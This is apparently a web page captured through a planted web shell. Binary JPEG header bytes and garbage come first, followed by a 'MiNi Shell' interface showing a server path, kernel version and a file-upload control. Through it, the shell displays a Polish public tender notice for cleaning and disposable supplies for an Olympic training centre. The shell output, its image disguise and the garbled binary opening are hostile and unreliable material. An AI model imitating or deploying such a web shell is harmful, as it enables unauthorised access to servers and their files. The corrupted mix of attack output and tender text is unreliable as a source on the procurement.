JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240719/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240719/0042192901-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Sukcesywne dostawy środków czystości, artykułów jednorazowych, środków do pralni i gastronomii do Ośrodka Przygotowań Olimpijskich we Władysławowie wraz z usługą transportu </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Centralny Ośrodek Sportu z siedzibą w Warszawie, (00-449), ul. Łazienkowska 6A, Ośrodek Przygotowań Olimpijskich we Władysławowie (84-120) ul. Żeromskiego 52</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 14273335600035</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Żeromskiego 52</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Władysławowo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">84-120</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL634 - Gdański</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi.wladyslawowo@cos.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.cos.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - instytucja gospodarki budżetowej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> sport </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Sukcesywne dostawy środków czystości, artykułów jednorazowych, środków do pralni i gastronomii do Ośrodka Przygotowań Olimpijskich we Władysławowie wraz z usługą transportu </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-da02b53f-4f4e-47fe-9148-ad827ec72cf1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00421929</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-07-19</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00019710/13/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.11 Sukcesywne dostawy środków czystości, artykułów jednorazowych, środków do pralni i gastronomii do Ośrodka Przygotowań Olimpijskich we Władysławowie wraz z usługą transportu</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-da02b53f-4f4e-47fe-9148-ad827ec72cf1 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>7. Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia ani logowania.<br/>8. Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych.<br/>9. Dokumenty elektroniczne, o których mowa w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, z uwzględnieniem rodzaju przekazywanych danych i przekazuje się jako załączniki.<br/>10. W przypadku formatów, o których mowa w art. 66 ust. 1 ustawy Pzp, ww. regulacje nie będą miały bezpośredniego zastosowania. – nie dotyczy niniejszego postepowania<br/>11. Informacje, oświadczenia lub dokumenty , inne niż wymienione w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych, przekazywane w postępowaniu sporządza się w postaci elektronicznej:<br/>a. w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności (i przekazuje się jako załącznik), lub<br/>b. jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści wiadomości e-mail lub w treści „Formularza do komunikacji”).<br/>12. Jeżeli dokumenty elektroniczne, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2020 r. poz. 1913 oraz z 2021 r. poz. 1655) wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku, wraz z jednoczesnym zaznaczeniem w nazwie pliku „Dokument stanowiący tajemnicę przedsiębiorstwa”.<br/>13. Komunikacja w postępowaniu, z wyłączeniem składania ofert/wniosków o dopuszczenie do udziału w postępowaniu, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”).<br/>Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/> administratorem Pani/Pana danych osobowych jest Centralny Ośrodek Sportu, ul. Łazienkowska 6a, 00-449 Warszawa.<br/> Dane kontaktowe do Inspektora Ochrony Danych: iod@cos.pl, tel. 513790306 ;<br/> Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego na ” SUKCESYWNE DOSTAWY Środków czystości i innych WRAZ Z USŁUGĄ TRANSPORTU DO OŚRODKA PRZYGOTOWAŃ OLIMPIJSKICH WE WŁADYSŁAWOWIE” odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 29 stycznia 2004 r. – Prawo zamówień publicznych (Dz. U. 2023 poz. 1605), dalej „ustawa Pzp”;<br/> Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/> obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/> w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/> posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych *;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO **;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">23/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 1 - Dział Gastronomii - środki do czyszczenia, konserwacji zmywarek i innych urządzeń gastronomicznych<br/>1	Nabłyszczasz do zmywarek typ: WINTERHALTER B100N pojemnik 10 l, wymagany produkt oryginalny, zgodnie z instrukcją obsługi urządzenia. op.	6,00<br/>2	Płyn do czyszenia systemów spieniających mleko w ekspresach 950 ml Franke, wymagany produkt oryginalny, zgodnie z instrukcją obsługi urządzenia	op.	16,00<br/>3	Płyn do zmywarek – detergent do mycia naczyń, zastosowanie do wszystkich typów zmywarek, wysoka zdolność mycia, do silnych zabrudzeń , nieszkodliwy dla środowiska typ: Primax Gastro 8400 pojemnik 25 kg	szt.	20,00<br/>4	Płyn do zmywarek – detergent do mycia naczyń, zastosowanie do wszystkich typów zmywarek, wysoka zdolność mycia, nieszkodliwy dla środowiska typ: WINTERHALTER F8400 pojemnik 25 kg, wymagany produkt oryginalny, dedykowany zgodnie z instrukcją urządzenia szt.	20,00<br/>5	Tabletki do czyszczenia ekspresu 100szt op. Urnex Cafiza E31 754631702108 wymagany produkt oryginalny, zgodnie z instrukcją obsługi urządzenia	op.	8,00<br/>6	Tabletki myjące Active Green do pieca konwekcyjnego Rational, 56.01.535, opakowanie 150 szt., wymagany produkt oryginalny, zgodnie z instrukcją obsługi urządzenia	op.	10,00<br/>7	Tabletki pielęgnacyjne do pieca konwekcyjnego Rational, 56.00.562, opakowanie 150 szt., wymagany produkt oryginalny, , zgodnie z instrukcją obsługi urządzenia	op.	10,00<br/>8	Tabletki solne do systemów zmiękczania wody, op. 25 kg	op.	260,00 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39831210-1 - Detergenty do zmywarek</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39831240-0 - Preparaty czyszczące</p> <p class="mb-0">14430000-4 - Sól warzona i czysty chlorek sodu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Procentowy</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 2 - Dział Gastronomii, Sportu, Rehabilitacji, Usług - Artykuły jednorazowe i do sprzątania<br/>1	Ręczniki papierowe jednowarstwowe, białe , makulaturowe, składane w systemie Z-Z; wymiary 23 cm x 25 cm; gramatura 36g/m; gofrowane, wodoodporne; bezzapachowe; opakowanie: ilość listków w bindzie: 200 szt., ilość listków w kartonie: 20 bind x 200 sztuk = 4000 listków.	karton	166<br/>2	Papier toaletowy standard, biały, mocny, dwuwarstwowy, perforowany, średnica rolki minimum 12 cm, średnica tulei max 4 cm, długość listka min. 10 cm, min. 200 listków, długość rolki min. 20 metrów.	rolka	23470<br/>3	Papier toaletowy, mocny, dwuwarstwowy, średnica rolki 135 mm, długość min. 96 mb , 800 listków, szerokość listka 100 mm , perforowany, do automatów np. typu Katrin System Toilet Plus (pasujący do posiadanych przez Zamawiającego pojemników) (1karton - 36 rolek) lub produkt równoważny	karton	32<br/>4	Papier typu: JUMBO, dwuwarstwowy, szerokośc rolki 9 cm, kolor biały	rolka	140<br/>5	ŚCIERKA Z MIKROFIBRY DO SPRZĄTANIA (oprócz czerwonej farbuje) wymiary 32 cm x 32 cm.	szt.	312<br/>6	ŚCIERKA Z MIKROFIBRY DO SPRZĄTANIA (oprócz czerwonej farbuje) wymiary 50 cm x 60 cm.	szt.	300<br/>7	WORKI NA ŚMIECI 35 L. Czarne, mocne zgrzewy, wytrzymałe, o grubości folii nie mniej niż 30 mikronów, nie pękające, pakowane w rolce, wykonane z polietylenu LDPE	szt.	12900<br/>8	WORKI NA ŚMIECI 60 L.Czarne, mocne zgrzewy, wytrzymałe, o grubości folii nie mniej niż 30 mikronów, nie pękające, pakowane w rolce, wykonane z polietylenu LDPE	szt.	15000<br/>9	WORKI NA ŚMIECI 120 L. Czarne, mocne zgrzewy, wytrzymałe, o grubości folii nie mniej niż 40 mikronów, nie pękające, pakowane w rolce, wykonane z polietylenu LDPE	szt.	5300<br/>10	WORKI NA ŚMIECI 160 L. Czarne, mocne zgrzewy, wytrzymałe, o grubości folii nie mniej niż 45 mikronów, nie pękające, pakowane w rolce, wykonane z polietylenu LDPE	szt.	16250<br/>11	Ręczniki papierowe celulozowe - dwuwarstwowe, białe, o mocnej strukturze, średnica rolki 255 mm, długość min 250 m, szerokość minimum 220 mm, do mycia okien dobrze wchłaniające wodę, nie pozostawiające smug	rolka	110<br/>12	Mop typu włoskiego popularnie zwany &#34;sukienką&#34;, bardzo trwały i chłonny, z żółtej mikrofibry min. 26 cm, u nasady plastikowe owalne (wrzecionowate) umocowanie do wkręcanego (gwint) kija, w środku mopa gąbka szorująca, typu &#34;Gosia&#34; lub produkt równoważny.	szt.	190<br/>13	Reklamówki tzw. koszulki rozmiar 30/10/55, wytrzymałe, dobrze zgrzewane.	szt.	41000<br/>14	Worki do odkurzacza KARCHER Typ KARCHER COMMERCIAL T7/1	szt.	10<br/>15	Worki do odkurzacza KARCHER Typ KARCHER COMMERCIAL T12/1	szt.	10<br/>16	Worki do odkurzacza ZELMER, typ:IZ-49.4020PF (4 sztuki)	opakowanie	50<br/>17	Worki do odkurzacza SPRINTUS ARUS, worek z wielowarstwowej włókniny, pojemność worka 7,5l (10 sztuk)	opakowanie	150<br/>18	Rekawice gumowe, wykonane z lateksu, wielokrotnego użytku, wyprofilowane, flokowane bawełną, z teksturowanymi palcami i wnętrzem dłoni, przylegające do dłoni, praktyczne do sprzątania. Rózne rozmiary. VILEDA	para	40<br/>19	Rękawice nitrylowe jednorazowe 100 sztuk w opakowaniu, produkt zgodny z normami: EN 980, EN 1041, EN ISO 14971, EN ISO 13485, EN 455-1, EN 455-2, EN 455-3, EN 455-4. Spełniający wymagania Dyrektywy Rady 93/42/EWG znowelizowanej Dyrektywą 2007/47/WE oraz Ustawy z dnia 20 maja 2010 roku o Wyrobach Medycznych (Dz.U.2010, Nr 107, poz.679). EN 374-1 z wyłączeniem punktu 5.3.2, EN 374-2, EN 420. Spełniający wymagania Dyrektywy 89/686/EEC jako środek ochrony indywidualnej (PPE) kategorii I (cat.I) do minimalnego ryzyka.	karton	278<br/>20	Ścierka pomarańczowa podłogowa 50 cm x 60 cm, pakowana pojedynczo, bardzo gruba i wytrzymała.	szt.	242<br/>21	Gąbka-zmywak,profesjonalna, ogólnego stosowania gąbka, pianka żółta, fibra zielona, minimalne wymiary 10 cm x 6 cm.	szt.	422<br/>22	Szczotka do naczyń z rączką typu szwedka, podłużna	szt.	60<br/>23	Kubki jednorazowe 200 ml, plastikowy, przezroczysty lub mleczny, posiadający ważne świadectwo jakości zdrowotnej lub pisemną deklarację producenta, do zimnych napoi , wytrzymałe , nie pękające przy mocniejszym uścisku, (opakowanie 100 szt.)	opak.	30<br/>24	ŚCIERKA VILEDA PCA MICRO	szt.	30<br/>25	MOP płaski VILEDA ULTRAMAX - wkład, 35 x 14 cm, szt.	60<br/>26	WORKI NA ŚMIECI 80 L.Czarne, mocne zgrzewy, wytrzymałe, o grubości folii nie mniej niż 30 mikronów, nie pękające, pakowane w rolce, wykonane z polietylenu LDPE	szt.	2500<br/>27	Szczotka do WC wkład	szt.	100<br/>28	Folia spożywcza 200 m w 1 opakowaniu	op	30<br/>29	Folia aluminiowa 200 m w 1 opakowaniu	op	30<br/>30	Druciaki do szorowania	szt.	20<br/>31	Sztućce plastikowe min. 100 szt. w opakowaniu	op.	150<br/>32	Talerzyki papierowe min. 100 szt. w opakowaniu	op.	100<br/>33	Serwetki min. 1000 szt. w opakowaniu	op	2400<br/>34	Serwetka fizelinowa duni 40x40 min. 50 szt. w opakowaniu	op	6<br/>35	Worki do szprycowania 530x275 min. 100 szt. w opakowaniu	op	3<br/>36	Worki na śmieci 360 l min. 10 szt. w opakowaniu	op	5<br/>37	Pojemnik do posiłku na wynos tzw. Menubox, 1 op min. 125 szt.	op	5<br/>38	Kubki plastikowe 80 ml, 1 op min. 100 szt. w opakowaniu	op	5<br/>39	Kubki plastikowe 200 ml, 1 op min. 100 szt. w opakowaniu	op	20<br/>40	Kubki plastikowe 500 ml, op. min. 50 szt.	opo	60 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33771000-5 - Toaletowe produkty z papieru</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">33761000-2 - Papier toaletowy</p> <p class="mb-0">39514200-0 - Ścierki</p> <p class="mb-0">18930000-7 - Worki i torby</p> <p class="mb-0">18937000-6 - Torebki do pakowania towarów</p> <p class="mb-0">39222120-1 - Kubki jednorazowe</p> <p class="mb-0">44174000-0 - Folia</p> <p class="mb-0">39224300-1 - Miotły i szczotki i inne artykuły do sprzątania w gospodarstwie domowym</p> <p class="mb-0">39222110-8 - Sztućce i talerze jednorazowe</p> <p class="mb-0">39513200-3 - Serwety stołowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span 